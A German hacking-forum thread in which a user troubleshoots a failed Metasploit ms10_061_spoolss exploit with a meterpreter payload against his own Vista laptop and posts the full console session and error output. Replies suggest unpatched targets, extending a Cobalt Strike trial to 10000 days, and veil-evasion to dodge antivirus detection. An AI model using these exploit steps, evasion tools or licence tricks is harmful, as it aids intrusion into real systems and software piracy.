hab folgendes problem will über armitage mein system testen aber jedesmal wenn ich ein exploit starte bekomme ich folgende fehlermeldung exploit: the server responded with error: STATUS_OBJECT_NAME_NOT_FOUND
hab schon über google nach hilfe für den fehler gesucht aber noch nichts hilfreiches gefunden deshalb hoffe ich mir kann hier jemand helfen wie ich den fehler beheben kann und der fehler kommt wenn ich ein exploit auf mein vista lapotop machen will
weiß jemand warum wenn ich armitage starte und es sich öffnet unten in der console nicht metasploit steht? sehe nur msf da stehen
greetz jeyfly
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
armitage fehlermeldung bei exploit
Erstellt von
bones
, 22.04.2014 15:37
#2
Geschrieben 22 April 2014 - 16:53 Uhr
1. Vista ist meiner meinung nach e scheisse, dann nimmste lieber Win Xp Ohne Updates .png' class='bbc_emoticon' alt='^^' />
2. msf steht für Metasploit Framework ..
3. Für solche Dinge sollte man e zu Linux greifen, z.b Backtrack, oder Kali Linux
4. Anhand deiner Infos ist es zumindest für mich echt schwer dir weiter zu helfen, könntest du mal ein Screen vom Ablauf machen ?
(Der Server konnte das Objekt nicht finden ... Welches Objekt, unter welchen umständen ....... ?, )
Was gibst du ein ?
welche "Options" hast du gesetzt
5. Warum nutzt du als Anfänger die Konsole und nicht die GUI ?
(ich gehe einfach mal von der Konsole aus, und nehme an, dass du nicht zuviel Erfahrung hast.. Falls ich mich irre, sry, nich böse gemeint)
2. msf steht für Metasploit Framework ..
3. Für solche Dinge sollte man e zu Linux greifen, z.b Backtrack, oder Kali Linux
4. Anhand deiner Infos ist es zumindest für mich echt schwer dir weiter zu helfen, könntest du mal ein Screen vom Ablauf machen ?
(Der Server konnte das Objekt nicht finden ... Welches Objekt, unter welchen umständen ....... ?, )
Was gibst du ein ?
welche "Options" hast du gesetzt
5. Warum nutzt du als Anfänger die Konsole und nicht die GUI ?
(ich gehe einfach mal von der Konsole aus, und nehme an, dass du nicht zuviel Erfahrung hast.. Falls ich mich irre, sry, nich böse gemeint)
#3
Geschrieben 22 April 2014 - 19:50 Uhr
#6
Geschrieben 23 April 2014 - 18:56 Uhr
also kali hab ich auf dem neusten stand
und so sieht die fehlermeldung aus die ich meist bekomme wenn ich ein exploit starte
msf> use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(ms10_061_spoolss) > set RPORT 445
RPORT => 445
msf exploit(ms10_061_spoolss) > set LPORT 29330
LPORT => 29330
msf exploit(ms10_061_spoolss) > set RHOST xxx.xxx.x.xxx
RHOST => xxx.xxx.x.xxx
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms10_061_spoolss) > set SMBPIPE spoolss
SMBPIPE => spoolss
msf exploit(ms10_061_spoolss) > set TARGET 0
TARGET => 0
msf exploit(ms10_061_spoolss) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:xxx.xxx.x.xxx[spoolss] ...
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
und so sieht die fehlermeldung aus die ich meist bekomme wenn ich ein exploit starte
msf> use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(ms10_061_spoolss) > set RPORT 445
RPORT => 445
msf exploit(ms10_061_spoolss) > set LPORT 29330
LPORT => 29330
msf exploit(ms10_061_spoolss) > set RHOST xxx.xxx.x.xxx
RHOST => xxx.xxx.x.xxx
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms10_061_spoolss) > set SMBPIPE spoolss
SMBPIPE => spoolss
msf exploit(ms10_061_spoolss) > set TARGET 0
TARGET => 0
msf exploit(ms10_061_spoolss) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:xxx.xxx.x.xxx[spoolss] ...
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
1GYoPAp8zWyerfctgwzw7rMkRWsEKHEkTi
#7
Geschrieben 23 June 2014 - 12:30 Uhr
an deiner Stelle würde ich mir cobaltstrike besorgen.
die Trial Version bekommst einfach und schnell auch auf 10000 Tage Testzeit gesetzt (oder mehr).
Ist die Bezahlversion von Armitage.
Zu deinem Problem.
Genau kann ich dir nicht sagen was da los ist, nur ein paar Ideen in die Runde werfen. Könnte halt viel Ursachen haben
die Trial Version bekommst einfach und schnell auch auf 10000 Tage Testzeit gesetzt (oder mehr).
Ist die Bezahlversion von Armitage.
Zu deinem Problem.
Genau kann ich dir nicht sagen was da los ist, nur ein paar Ideen in die Runde werfen. Könnte halt viel Ursachen haben
- Anti Virus /Firewall (nicht nur bei deinem Ziel-PC, denn es kann sein das dein AV in deiner VM manche Exploits entschärft.
- alle ServicePacks bei dem Zielrechner installiert? vielleicht ist dein Vista resistent gegen dein meterpreter
veil-evasion finde ich auch ganz gut, die exploits werden ab werk nicht so schnell erkannt. (glaube sudo apt-get install veil-evasion oder so)
Falls du die lösung schon gefunden hast, kannst ja mal der Vollstänigkeit halber schreiben woran es lag.
Das ist keine Lüge sondern eine sachzwangreduzierte Ehrlichkeit
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
Python bringt Fehlermeldung |
Sonstige | Avni |
|
|
|
AUTO SHELLS EXPLOIT - AUTO UPLAOD [SHELLS & FILES] |
Leaks | annaa |
|
|
|
SMTP-EX - SMTP Exploit |
Leaks | annaa |
|
|
Besucher die dieses Thema lesen:
Mitglieder: , Gäste: , unsichtbare Mitglieder: